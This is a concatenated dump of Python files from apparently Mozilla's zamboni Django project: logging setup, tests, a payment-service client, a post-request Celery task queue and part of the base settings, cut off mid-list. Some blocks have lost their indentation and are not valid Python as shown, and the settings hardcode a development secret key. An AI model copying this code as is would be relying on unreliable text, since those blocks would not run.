        'propagate': True,
    },
    'caching': {
        'level': 'ERROR',
    },
    'newrelic': {
        'level': 'WARNING',
    },
    'elasticutils': {
        'level': 'WARNING',
    },
    'suds': {
        'level': 'ERROR',
        'propagate': True
    },
}
# dictConfig-style config assembled from the pieces above; log_configure()
# merges settings.LOGGING into this before applying it.
cfg = {
    'version': 1,
    'filters': {},
    'formatters': formatters,
    'handlers': handlers,
    'loggers': loggers,
    'root': {},
}
def log_configure():
    """You have to explicitly call this to configure logging.

    Merges settings.LOGGING into the module-level `cfg`, fills in default
    handlers/levels/propagation for every logger and hands the result to
    dictconfig.dictConfig().
    """
    # Overlay the project's LOGGING settings onto the defaults above.
    for key, value in settings.LOGGING.items():
        if isinstance(cfg[key], dict):
            cfg[key].update(value)
        else:
            cfg[key] = value

    USE_SYSLOG = settings.HAS_SYSLOG and not settings.DEBUG

    if USE_SYSLOG:
        cfg['loggers']['z.timer'] = {'handlers': ['syslog2']}

    # Set the level and handlers for all loggers.  Wrap .values() in list()
    # so the concatenation also works with Python 3 dict views (identical
    # result on Python 2).
    for logger in list(cfg['loggers'].values()) + [cfg['root']]:
        if 'handlers' not in logger:
            logger['handlers'] = ['syslog' if USE_SYSLOG else 'console']
        if 'level' not in logger:
            logger['level'] = settings.LOG_LEVEL
        if logger is not cfg['root'] and 'propagate' not in logger:
            logger['propagate'] = False

    dictconfig.dictConfig(cfg)
########NEW FILE########
__FILENAME__ = test
# -*- coding: utf8 -*-
import mock
import amo.tests
from lib.metrics import record_action
class TestMetrics(amo.tests.TestCase):
    @mock.patch('lib.metrics.record_stat')
    def test_record_action(self, record_stat):
        # Minimal fake request carrying a source, locale and user agent.
        request = mock.Mock()
        request.GET = {'src': 'foo'}
        request.LANG = 'en'
        request.META = {'HTTP_USER_AGENT': 'py'}
        record_action('install', request, {})
        # record_action must forward the request metadata as kwargs.
        record_stat.assert_called_with('install', request,
            **{'locale': 'en', 'src': 'foo', 'user-agent': 'py'})
########NEW FILE########
__FILENAME__ = admin_log
import logging
getLogger = logging.getLogger
# This can be removed when we go to Python 2.7.
class NullHandler(logging.Handler):
    """Handler that silently discards every record (stdlib ships one in 2.7+)."""
    def emit(self, record):
        # Intentionally a no-op.
        pass
# Ensure the creation of the Django logger
# with a null handler. This ensures we don't get any
# 'No handlers could be found for logger "django"' messages
logger = getLogger('django')
if not logger.handlers:
    logger.addHandler(NullHandler())
########NEW FILE########
__FILENAME__ = test_log
import logging
from django.conf import settings
from nose.tools import eq_
from heka.config import client_from_dict_config
import amo.tests
import commonware.log
from lib.log_settings_base import error_fmt
# Logging config used by these tests.  NOTE(review): 'test_syslog' points at
# lib.misc.admin_log.ErrorSyslogHandler — confirm that class exists; only a
# NullHandler is visible in admin_log here.
cfg = {
    'version': 1,
    'formatters': {
        'error': {
            '()': commonware.log.Formatter,
            'datefmt': '%H:%M:%S',
            'format': ('%s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
                       % (settings.SYSLOG_TAG, error_fmt)),
        },
    },
    'handlers': {
        'test_syslog': {
            'class': 'lib.misc.admin_log.ErrorSyslogHandler',
            'formatter': 'error',
        },
    },
    'loggers': {
        'test.lib.misc.logging': {
            'handlers': ['test_syslog'],
            'level': 'ERROR',
            'propagate': False,
        },
    },
}
class TestHekaStdLibLogging(amo.tests.TestCase):
    """
    The StdLibLoggingStream is only used for *debugging* purposes.
    Some detail is lost when you write out to a StdLibLoggingStream -
    specifically the logging level.
    """
    def setUp(self):
        HEKA_CONF = {
            'encoder': 'heka.encoders.StdlibPayloadEncoder',
            'stream': {
                'class': 'heka.streams.logging.StdLibLoggingStream',
                'logger_name': 'z.heka',
            }
        }
        self.heka = client_from_dict_config(HEKA_CONF)
        self.logger = logging.getLogger('z.heka')
        """
        When logging.config.dictConfig is used to configure logging
        with a 'one-shot' config dictionary, any previously
        instantiated singleton loggers (ie: all old loggers not in
        the new config) will be explicitly disabled.
        """
        self.logger.disabled = False
        # Swap in a buffering handler so tests can inspect emitted records.
        self._orig_handlers = self.logger.handlers
        self.handler = logging.handlers.BufferingHandler(65536)
        self.logger.handlers = [self.handler]
    def tearDown(self):
        # Restore the logger's original handlers.
        self.logger.handlers = self._orig_handlers
    def test_oldstyle_sends_msg(self):
        msg = 'an error'
        self.heka.error(msg)
        logrecord = self.handler.buffer[-1]
        self.assertEqual(logrecord.msg, "oldstyle: %s" % msg)
        eq_(logrecord.levelno, logging.ERROR)
        msg = 'info'
        self.heka.info(msg)
        logrecord = self.handler.buffer[-1]
        self.assertEqual(logrecord.msg, "oldstyle: %s" % msg)
        self.assertEqual(logrecord.levelname, 'INFO')
        msg = 'warn'
        self.heka.warn(msg)
        logrecord = self.handler.buffer[-1]
        eq_(logrecord.msg, "oldstyle: %s" % msg)
        eq_(logrecord.levelno, logging.WARN)
        # debug shouldn't log
        # NOTE(review): no heka.debug() call precedes this check; as written
        # it re-asserts the warn record above — confirm the intent.
        eq_(logrecord, self.handler.buffer[-1])
    def test_other_sends_json(self):
        timer = 'footimer'
        elapsed = 4
        self.heka.timer_send(timer, elapsed)
        logrecord = self.handler.buffer[-1]
        # Note that the fact that this is a timer is lost entirely
        eq_(logrecord.levelno, logging.INFO)
        eq_(logrecord.msg, "timer: %s" % str(elapsed))
class TestRaven(amo.tests.TestCase):
    def setUp(self):
        """
        We need to set the settings.HEKA instance to use a
        DebugCaptureStream so that we can inspect the sent messages.
        """
        heka = settings.HEKA
        HEKA_CONF = {
            'logger': 'zamboni',
            'stream': {'class': 'heka.streams.DebugCaptureStream'},
            'encoder': 'heka.encoders.NullEncoder'
        }
        # client_from_dict_config is already imported at module level; the
        # redundant function-local import has been removed.
        self.heka = client_from_dict_config(HEKA_CONF, heka)
    def test_send_raven(self):
        # Trigger a real exception so raven has a traceback to capture.
        # Catch it narrowly instead of with a bare `except:`, which would
        # also swallow KeyboardInterrupt/SystemExit.
        try:
            1 / 0
        except ZeroDivisionError:
            self.heka.raven('blah')
        eq_(len(self.heka.stream.msgs), 1)
        msg = self.heka.stream.msgs[0]
        eq_(msg.type, 'sentry')
########NEW FILE########
__FILENAME__ = urlconf_decorator
"""
Apply a decorator to a whole urlconf instead of a single view function.
Usage::
>>> from urlconf_decorator import decorate
>>>
>>> def dec(f):
... def wrapper(*args, **kw):
... print 'inside the decorator'
... return f(*args, **kw)
... return wrapper
>>>
>>> urlpatterns = patterns(''
... url('^admin/', decorate(dec, include(admin.site.urls))),
... )
The decorator applied to the urlconf is a normal function decorator. It gets
wrapped around each callback in the urlconf as if you had @decorator above the
function.
"""
from django.core.urlresolvers import RegexURLResolver, RegexURLPattern
def decorate(decorator, urlconf):
    """Recursively wrap every view callback in `urlconf` with `decorator`.

    Accepts a list/tuple of urlconf entries, a RegexURLResolver (e.g. an
    include()) or a single RegexURLPattern; returns `urlconf` itself.
    """
    if isinstance(urlconf, (list, tuple)):
        for entry in urlconf:
            decorate(decorator, entry)
    elif isinstance(urlconf, RegexURLResolver):
        # Recurse into the included patterns.
        for entry in urlconf.url_patterns:
            decorate(decorator, entry)
    elif isinstance(urlconf, RegexURLPattern):
        # Replace the pattern's callback with the decorated one.
        urlconf._callback = decorator(urlconf.callback)
    return urlconf
########NEW FILE########
__FILENAME__ = base
import datetime
import decimal
import json
import logging
import urllib
from django.conf import settings
from curling.lib import API
from tower import ugettext_lazy as _
log = logging.getLogger('s.client')
class SolitudeError(Exception):
    """Base error for solitude client failures; carries a numeric `code`."""

    def __init__(self, *args, **kwargs):
        # Pull the optional error code out before Exception sees the kwargs.
        code = kwargs.pop('code', 0)
        super(SolitudeError, self).__init__(*args, **kwargs)
        self.code = code
class SolitudeOffline(SolitudeError):
    # Marker subclass; presumably raised when solitude is unreachable —
    # confirm against the callers that raise it.
    pass
class SolitudeTimeout(SolitudeError):
    # Marker subclass; presumably raised when a solitude call times out.
    pass
date_format = '%Y-%m-%d'
time_format = '%H:%M:%S'


class Encoder(json.JSONEncoder):
    """JSON encoder serializing dates, times and decimals for solitude."""

    ENCODINGS = {
        datetime.datetime:
            lambda v: v.strftime('%s %s' % (date_format, time_format)),
        datetime.date: lambda v: v.strftime(date_format),
        datetime.time: lambda v: v.strftime(time_format),
        decimal.Decimal: str,
    }

    def default(self, v):
        """Encode some of our basic types in ways solitude understands."""
        # Exact-type dispatch; unknown types fall through to the stock
        # encoder, which raises TypeError.
        encode = self.ENCODINGS.get(type(v))
        if encode is None:
            return super(Encoder, self).default(v)
        return encode(v)
# Lazily-translated fallback message shown for unexpected failures.
general_error = _('Oops, we had an error processing that.')
class Client(object):
    def __init__(self, config=None):
        """Build an OAuth-authenticated curling API client for solitude.

        NOTE(review): `config` defaults to None but is dereferenced below
        (config['server'] and parse()'s config.get) — confirm callers
        always pass a config dict.
        """
        # Normalized copy of the config (only the 'server' key is kept).
        self.config = self.parse(config)
        self.api = API(config['server'])
        self.api.activate_oauth(settings.SOLITUDE_OAUTH.get('key'),
                                settings.SOLITUDE_OAUTH.get('secret'))
        # Placeholder; see Encoder above for the JSON encoder used elsewhere.
        self.encoder = None
        self.filter_encoder = urllib.urlencode
    def parse(self, config=None):
        # Keep only the keys this client understands.
        return {'server': config.get('server')}
########NEW FILE########
__FILENAME__ = test
import datetime
import json
from django.conf import settings
import test_utils
from mock import patch
from nose.tools import eq_
from addons.models import Addon
import amo
from users.models import UserProfile
from lib.pay_server import filter_encoder, model_to_uid, ZamboniEncoder
# NOTE(review): ('http://localhost') is a plain string, not a 1-tuple —
# a trailing comma is missing if a tuple was intended; confirm.
@patch.object(settings, 'SOLITUDE_HOSTS', ('http://localhost'))
@patch.object(settings, 'DOMAIN', 'testy')
class TestUtils(test_utils.TestCase):
    def setUp(self):
        self.user = UserProfile.objects.create()
        self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP)
    def test_uid(self):
        # UIDs take the form '<domain>:<model table>:<pk>'.
        eq_(model_to_uid(self.user), 'testy:users:%s' % self.user.pk)
    def test_encoder(self):
        today = datetime.date.today()
        res = json.loads(json.dumps({'uuid': self.user, 'date': today},
                                    cls=ZamboniEncoder))
        # Models serialize to their UID, dates to ISO format.
        eq_(res['uuid'], 'testy:users:%s' % self.user.pk)
        eq_(res['date'], today.strftime('%Y-%m-%d'))
    def test_filter_encoder(self):
        # '%%' because the expected string is itself run through %-format.
        eq_(filter_encoder({'uuid': self.user, 'bar': 'bar'}),
            'bar=bar&uuid=testy%%3Ausers%%3A%s' % self.user.pk)
########NEW FILE########
__FILENAME__ = task
import threading
from functools import partial
from django.core.signals import got_request_exception, request_finished
import commonware.log
from celery import task as base_task
from celery import Task
log = commonware.log.getLogger('z.post_request_task')
_locals = threading.local()
def _get_task_queue():
"""Returns the calling thread's task queue."""
return _locals.__dict__.setdefault('task_queue', [])
def _send_tasks(**kwargs):
    """Fire off all delayed Celery tasks for this thread, in FIFO order."""
    queue = _get_task_queue()
    while queue:
        # Each entry is (task class, args, kwargs) as stored by _append_task.
        task_cls, task_args, task_kwargs = queue.pop(0)
        task_cls.original_apply_async(*task_args, **task_kwargs)
def _discard_tasks(**kwargs):
    """Drop every delayed Celery task queued on this thread."""
    # Clear in place so existing references to the queue stay valid.
    del _get_task_queue()[:]
def _append_task(t):
    """Append a task to the queue.

    Expected argument is a tuple of the (task class, args, kwargs).
    This doesn't append to queue if the argument is already in the queue.
    """
    queue = _get_task_queue()
    if t not in queue:
        queue.append(t)
    else:
        # Nothing is removed here — the duplicate call is simply not queued
        # again.  (The old message, 'Removed duplicate task', was wrong.)
        log.debug('Skipped duplicate task: %s' % (t,))
class PostRequestTask(Task):
    """A task whose execution is delayed until after the request finishes.
    This simply wraps celery's `@task` decorator and stores the task calls
    until after the request is finished, then fires them off.
    """
    abstract = True
    def original_apply_async(self, *args, **kwargs):
        # Bypass the queueing below and invoke celery's real apply_async;
        # called by _send_tasks once the request is done.
        return super(PostRequestTask, self).apply_async(*args, **kwargs)
    def apply_async(self, *args, **kwargs):
        # Queue the call instead of sending it immediately.
        # NOTE(review): returns None rather than celery's usual AsyncResult —
        # confirm no caller relies on the return value.
        _append_task((self, args, kwargs))
# Replacement `@task` decorator.
task = partial(base_task, base=PostRequestTask)
# Hook the signal handlers up.
# Send the queued tasks when the request completes normally...
request_finished.connect(_send_tasks)
# ...and throw them away when the request raised an exception.
got_request_exception.connect(_discard_tasks)
########NEW FILE########
__FILENAME__ = tests
from django.core.signals import request_finished
from django.test import TestCase
from mock import Mock, patch
from nose.tools import eq_
from .task import task, _get_task_queue, _discard_tasks
# Records each actual task execution so tests can assert on call state.
task_mock = Mock()
@task
def test_task():
    task_mock()
class TestTask(TestCase):
    def tearDown(self):
        # Reset the shared mock and thread-local queue between tests.
        task_mock.reset_mock()
        _discard_tasks()
    def _verify_task_filled(self):
        # Assert exactly one queued call and that it is our test task.
        queue = _get_task_queue()
        size = len(queue)
        eq_(size, 1, 'Expected 1 task in the queue, found %d' % size)
        cls, args, kwargs = queue[0]
        eq_(cls.name,
            '%s.%s' % (test_task.__module__, test_task.__name__),
            'Expected the test task, found %s' % cls.name)
    def _verify_task_empty(self):
        assert len(_get_task_queue()) == 0
    def test_task(self):
        # delay() must queue, not execute, while the request is in flight.
        test_task.delay()
        assert not task_mock.called
    @patch('lib.post_request_task.task.PostRequestTask.original_apply_async')
    def test_request_finished(self, _mock):
        with self.settings(CELERY_ALWAYS_EAGER=False):
            test_task.delay()
            self._verify_task_filled()
            request_finished.send(sender=self)
            self._verify_task_empty()
            # Assert the original `apply_async` called.
            assert _mock.called
    @patch('lib.post_request_task.task.PostRequestTask.original_apply_async')
    def test_request_failed(self, _mock):
        with self.settings(CELERY_ALWAYS_EAGER=False):
            test_task.delay()
            self._verify_task_filled()
            # Simulate a request exception.
            _discard_tasks()
            self._verify_task_empty()
            # Assert the original `apply_async` was not called.
            assert not _mock.called
    def test_deduplication(self):
        """Test the same task added multiple times is de-duped."""
        with self.settings(CELERY_ALWAYS_EAGER=False):
            test_task.delay()
            test_task.delay()
            self._verify_task_filled()
########NEW FILE########
__FILENAME__ = settings_base
# -*- coding: utf-8 -*-
# Django settings for zamboni project.
import logging
import os
import socket
from django.utils.functional import lazy
from heka.config import client_from_dict_config
ALLOWED_HOSTS = [
'.allizom.org',
'.mozilla.org',
'.mozilla.com',
'.mozilla.net',
]
# jingo-minify settings
CACHEBUST_IMGS = True
try:
# If we have build ids available, we'll grab them here and add them to our
# CACHE_PREFIX. This will let us not have to flush memcache during updates
# and it will let us preload data into it before a production push.
from build import BUILD_ID_CSS, BUILD_ID_JS
build_id = "%s%s" % (BUILD_ID_CSS[:2], BUILD_ID_JS[:2])
except ImportError:
build_id = ""
# jingo-minify: Style sheet media attribute default
CSS_MEDIA_DEFAULT = 'all'
# Make filepaths relative to the root of zamboni.
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


def path(*parts):
    """Return an absolute path built from components under ROOT.

    Defined with `def` rather than a lambda assignment (PEP 8 E731);
    callers are unchanged.
    """
    return os.path.join(ROOT, *parts)
# We need to track this because hudson can't just call its checkout "zamboni".
# It puts it in a dir called "workspace". Way to be, hudson.
ROOT_PACKAGE = os.path.basename(ROOT)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = True
# need to view JS errors on a remote device? (requires node)
# > npm install now
# > node media/js/debug/remote_debug_server.node.js
# REMOTE_JS_DEBUG = 'localhost:37767'
# then connect to http://localhost:37767/ to view
REMOTE_JS_DEBUG = False
# LESS CSS OPTIONS (Debug only).
LESS_PREPROCESS = True # Compile LESS with Node, rather than client-side JS?
LESS_LIVE_REFRESH = False # Refresh the CSS on save?
LESS_BIN = 'lessc'
# Path to stylus (to compile .styl files).
STYLUS_BIN = 'stylus'
# Path to cleancss (our CSS minifier).
CLEANCSS_BIN = 'cleancss'
# Path to uglifyjs (our JS minifier).
UGLIFY_BIN = 'uglifyjs' # Set as None to use YUI instead (at your risk).
# Path to pngcrush (for image optimization).
PNGCRUSH_BIN = 'pngcrush'
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
FLIGTAR = '[email protected]'
EDITORS_EMAIL = '[email protected]'
SENIOR_EDITORS_EMAIL = '[email protected]'
THEMES_EMAIL = '[email protected]'
MARKETPLACE_EMAIL = '[email protected]'
ABUSE_EMAIL = '[email protected]'
NOBODY_EMAIL = '[email protected]'
DATABASES = {
'default': {
'NAME': 'zamboni',
'ENGINE': 'django.db.backends.mysql',
'HOST': '',
'PORT': '',
'USER': '',
'PASSWORD': '',
'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
'TEST_CHARSET': 'utf8',
'TEST_COLLATION': 'utf8_general_ci',
},
}
# A database to be used by the services scripts, which does not use Django.
# The settings can be copied from DATABASES, but since its not a full Django
# database connection, only some values are supported.
SERVICES_DATABASE = {
'NAME': 'zamboni',
'USER': '',
'PASSWORD': '',
'HOST': '',
}
DATABASE_ROUTERS = ('multidb.PinningMasterSlaveRouter',)
# For use django-mysql-pool backend.
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 300
}
# Put the aliases for your slave databases in this list.
SLAVE_DATABASES = []
PASSWORD_HASHERS = ()
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Los_Angeles'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-US'
# Accepted locales
# Note: If you update this list, don't forget to also update the locale
# permissions in the database.
AMO_LANGUAGES = (
'af', 'ar', 'bg', 'bn-BD', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es',
'eu', 'fa', 'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mk',
'mn', 'nl', 'pl', 'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sv-SE',
'uk', 'vi', 'zh-CN', 'zh-TW',
)
# Explicit conversion of a shorter language code into a more specific one.
SHORTER_LANGUAGES = {
'en': 'en-US', 'ga': 'ga-IE', 'pt': 'pt-PT', 'sv': 'sv-SE', 'zh': 'zh-CN'
}
# Not shown on the site, but .po files exist and these are available on the
# L10n dashboard. Generally languages start here and move into AMO_LANGUAGES.
HIDDEN_LANGUAGES = ('cy', 'hr', 'sr', 'sr-Latn', 'tr')
def lazy_langs(languages):
    """Map lowercased locale codes to their native language names.

    Returns {} when product_details has no language data yet (e.g. before
    the product-details JSON has been downloaded).
    """
    from product_details import product_details
    if not product_details.languages:
        return {}
    return dict((code.lower(), product_details.languages[code]['native'])
                for code in languages)
# Where product details are stored see django-mozilla-product-details
PROD_DETAILS_DIR = path('lib/product_json')
# Override Django's built-in with our native names
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
RTL_LANGUAGES = ('ar', 'fa', 'fa-IR', 'he')
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
# Tower / L10n
LOCALE_PATHS = (path('locale'),)
TEXT_DOMAIN = 'messages'
STANDALONE_DOMAINS = [TEXT_DOMAIN, 'javascript']
TOWER_KEYWORDS = {
'_lazy': None,
}
TOWER_ADD_HEADERS = True
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# The host currently running the site. Only use this in code for good reason;
# the site is designed to run on a cluster and should continue to support that
HOSTNAME = socket.gethostname()
# The front end domain of the site. If you're not running on a cluster this
# might be the same as HOSTNAME but don't depend on that. Use this when you
# need the real domain.
DOMAIN = HOSTNAME
# Full base URL for your main site including protocol. No trailing slash.
# Example: https://addons.mozilla.org
SITE_URL = 'http://%s' % DOMAIN
# Domain of the services site. This is where your API, and in-product pages
# live.
SERVICES_DOMAIN = 'services.%s' % DOMAIN
# Full URL to your API service. No trailing slash.
# Example: https://services.addons.mozilla.org
SERVICES_URL = 'http://%s' % SERVICES_DOMAIN
# The domain of the mobile site.
MOBILE_DOMAIN = 'm.%s' % DOMAIN
# The full url of the mobile site.
MOBILE_SITE_URL = 'http://%s' % MOBILE_DOMAIN
OAUTH_CALLBACK_VIEW = 'api.views.request_token_ready'
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = path('media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to a temporary storage area
TMP_PATH = path('tmp')
# When True, create a URL root /tmp that serves files in your temp path.
# This is useful for development to view upload pics, etc.
# NOTE: This only works when DEBUG is also True.
SERVE_TMP_PATH = False
# Absolute path to a writable directory shared by all servers. No trailing
# slash. Example: /data/
NETAPP_STORAGE = TMP_PATH
# File path for storing XPI/JAR files (or any files associated with an
# add-on). Example: /mnt/netapp_amo/addons.mozilla.org-remora/files
ADDONS_PATH = NETAPP_STORAGE + '/addons'
# Like ADDONS_PATH but protected by the app. Used for storing files that should
# not be publicly accessible (like disabled add-ons).
GUARDED_ADDONS_PATH = NETAPP_STORAGE + '/guarded-addons'
# Used for storing signed webapps.
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed-apps'
# Special reviewer signed ones for special people.
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed-apps-reviewer'
# A separate signing server for signing packaged apps. If not set, for example
# on local dev instances, the file will just be copied over unsigned.
SIGNED_APPS_SERVER_ACTIVE = False
# The reviewers equivalent to the above.
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = False
# This is the signing REST server for signing apps.
SIGNED_APPS_SERVER = ''
# This is the signing REST server for signing apps with the reviewers cert.
SIGNED_APPS_REVIEWER_SERVER = ''
# And how long we'll give the server to respond.
SIGNED_APPS_SERVER_TIMEOUT = 10
# Send the more terse manifest signatures to the app signing server.
SIGNED_APPS_OMIT_PER_FILE_SIGS = True
# Absolute path to a writable directory shared by all servers. No trailing
# slash.
# Example: /data/uploads
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
# File path for add-on files that get rsynced to mirrors.
# /mnt/netapp_amo/addons.mozilla.org-remora/public-staging
MIRROR_STAGE_PATH = NETAPP_STORAGE + '/public-staging'
# Where dumped apps will be written to.
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
# Tarballs in DUMPED_APPS_PATH deleted 30 days after they have been written.
DUMPED_APPS_DAYS_DELETE = 3600 * 24 * 30
# Where dumped users will be written to.
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
# Tarballs in DUMPED_USERS_PATH deleted 30 days after they have been written.
DUMPED_USERS_DAYS_DELETE = 3600 * 24 * 30
# paths that don't require an app prefix
SUPPORTED_NONAPPS = ('about', 'admin', 'apps', 'credits',
'developer_agreement', 'developer_faq', 'developers',
'editors', 'faq', 'google1f3e37b7351799a5.html', 'img',
'jsi18n', 'media', 'review_guide', 'robots.txt',
'statistics', 'services', 'sunbird')
DEFAULT_APP = 'firefox'
# paths that don't require a locale prefix
SUPPORTED_NONLOCALES = ('google1f3e37b7351799a5.html', 'img', 'media',
'robots.txt', 'services', 'downloads')
# Make this unique, and don't share it with anybody.
# NOTE(review): hardcoded dev placeholder — production settings must
# override this value; confirm deployments do so.
SECRET_KEY = 'r#%9w^o_80)7f%!_ir5zx$tu3mupw9u%&s!)-_q%gy7i+fhx#)'
# Templates
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'lib.template_loader.Loader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# We don't want jingo's template loader to pick up templates for third party
# apps that don't use Jinja2. The following is a list of prefixes for jingo to
# ignore.
JINGO_EXCLUDE_APPS = (
'djcelery',
'django_extensions',
'admin',
'browserid',
'toolbar_statsd',
'registration',
'debug_toolbar',
'waffle',
)
JINGO_EXCLUDE_PATHS = (
'webapps/dump',
'users/email',
'reviews/emails',
'editors/emails',
'amo/emails',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'django.core.context_processors.request',
'session_csrf.context_processor',
'django.contrib.messages.context_processors.messages',
'amo.context_processors.app',
'amo.context_processors.i18n',
'amo.context_processors.global_settings',
'amo.context_processors.static_url',
'jingo_minify.helpers.build_ids',
)
TEMPLATE_DIRS = (
path('media/docs'),
path('templates'),
)
def JINJA_CONFIG():
    """Build the Jinja2 environment config (extensions, finalize, cache)."""
    import jinja2
    from django.conf import settings
    from django.core.cache import cache
    config = {'extensions': ['tower.template.i18n', 'amo.ext.cache',
                             'jinja2.ext.do',
                             'jinja2.ext.with_', 'jinja2.ext.loopcontrols'],
              # Render None as '' instead of the string 'None'.
              'finalize': lambda x: x if x is not None else ''}
    # The `if False` deliberately disables the memcached bytecode cache
    # below; flip it to `if not settings.DEBUG` to re-enable.
    if False and not settings.DEBUG:
        # We're passing the _cache object directly to jinja because
        # Django can't store binary directly; it enforces unicode on it.
        # Details: http://jinja.pocoo.org/2/documentation/api#bytecode-cache
        # and in the errors you get when you try it the other way.
        bc = jinja2.MemcachedBytecodeCache(cache._cache,
                                           "%sj2:" % settings.CACHE_PREFIX)
        config['cache_size'] = -1  # Never clear the cache
        config['bytecode_cache'] = bc
    return config
# Request pipeline, authentication, installed applications, test runner and
# l10n-extraction configuration.  Middleware order is significant.
MIDDLEWARE_CLASSES = (
    # AMO URL middleware comes first so everyone else sees nice URLs.
    'django_statsd.middleware.GraphiteRequestTimingMiddleware',
    'django_statsd.middleware.GraphiteMiddleware',
    'amo.middleware.LocaleAndAppURLMiddleware',
    # Mobile detection should happen in Zeus.
    'mobility.middleware.DetectMobileMiddleware',
    'mobility.middleware.XMobileMiddleware',
    'amo.middleware.RemoveSlashMiddleware',
    # Munging REMOTE_ADDR must come before ThreadRequest.
    'commonware.middleware.SetRemoteAddrFromForwardedFor',
    'commonware.middleware.FrameOptionsHeader',
    'commonware.middleware.StrictTransportMiddleware',
    'multidb.middleware.PinningRouterMiddleware',
    'waffle.middleware.WaffleMiddleware',
    'csp.middleware.CSPMiddleware',
    'amo.middleware.CommonMiddleware',
    'amo.middleware.NoVarySessionMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'commonware.log.ThreadRequestMiddleware',
    'mkt.search.middleware.ElasticsearchExceptionMiddleware',
    # NOTE: read_only_mode() (defined later in this file) inserts
    # ReadOnlyMiddleware immediately before this entry, so keep it present.
    'session_csrf.CsrfMiddleware',
    # This should come after authentication middleware
    'access.middleware.ACLMiddleware',
    'commonware.middleware.ScrubRequestOnException',
)
# Auth
AUTHENTICATION_BACKENDS = (
    'django_browserid.auth.BrowserIDBackend',
)
AUTH_USER_MODEL = 'users.UserProfile'
# Override this in the site settings.
ROOT_URLCONF = 'lib.urls_base'
INSTALLED_APPS = (
    'amo',  # amo comes first so it always takes precedence.
    'abuse',
    'access',
    'addons',
    'applications',
    'cronjobs',
    'csp',
    'editors',
    'files',
    'jingo_minify',
    'lib.es',
    'product_details',
    'reviews',
    'stats',
    'tags',
    'tower',  # for ./manage.py extract
    'translations',
    'users',
    'versions',
    'mkt.webapps',
    'mkt.collections',
    'mkt.comm',
    'mkt.prices',
    'zadmin',
    # Third party apps
    'djcelery',
    'django_extensions',
    'django_nose',
    'gunicorn',
    'raven.contrib.django',
    'waffle',
    # Django contrib apps
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.messages',
    'django.contrib.sessions',
    # Has to load after auth
    'django_browserid',
    'django_statsd',
)
# These apps are only needed in a testing environment. They are added to
# INSTALLED_APPS by the RadicalTestSuiteRunnerWithExtraApps test runner.
TEST_INSTALLED_APPS = (
    'translations.tests.testapp',
)
# Tests
TEST_RUNNER = 'amo.runner.RadicalTestSuiteRunnerWithExtraApps'
# mkt/* has its own settings/test entry point, hence the exclusion here.
NOSE_ARGS = [
    '--with-fixture-bundling',
    '--exclude=mkt/*',
]
# Tells the extract script what files to look for l10n in and what function
# handles the extraction. The Tower library expects this.
DOMAIN_METHODS = {
    'messages': [
        ('apps/**.py',
         'tower.management.commands.extract.extract_tower_python'),
        ('apps/**/templates/**.html',
         'tower.management.commands.extract.extract_tower_template'),
        ('templates/**.html',
         'tower.management.commands.extract.extract_tower_template'),
        ('mkt/**.py',
         'tower.management.commands.extract.extract_tower_python'),
        ('mkt/**/templates/**.html',
         'tower.management.commands.extract.extract_tower_template'),
        ('mkt/templates/**.html',
         'tower.management.commands.extract.extract_tower_template'),
        ('**/templates/**.lhtml',
         'tower.management.commands.extract.extract_tower_template'),
    ],
    'javascript': [
        # We can't say **.js because that would dive into mochikit and timeplot
        # and all the other baggage we're carrying. Timeplot, in particular,
        # crashes the extractor with bad unicode data.
        ('media/js/*.js', 'javascript'),
        ('media/js/common/**.js', 'javascript'),
        ('media/js/impala/**.js', 'javascript'),
        ('media/js/zamboni/**.js', 'javascript'),
        ('media/js/devreg/**.js', 'javascript'),
    ],
}
# Bundles is a dictionary of two dictionaries, css and js, which list css files
# and js files that can be bundled together by the minify app.
# NOTE(review): entries ending in .less are preprocessed by the asset
# pipeline; the 'debug' JS bundle below loads less.js for in-browser
# compilation when DEBUG is True.  File ORDER within a bundle matters.
MINIFY_BUNDLES = {
    'css': {
        # CSS files common to the entire site.
        'zamboni/css': (
            'css/legacy/main.css',
            'css/legacy/main-mozilla.css',
            'css/legacy/jquery-lightbox.css',
            'css/legacy/autocomplete.css',
            'css/zamboni/zamboni.css',
            'css/global/headerfooter.css',
            'css/zamboni/tags.css',
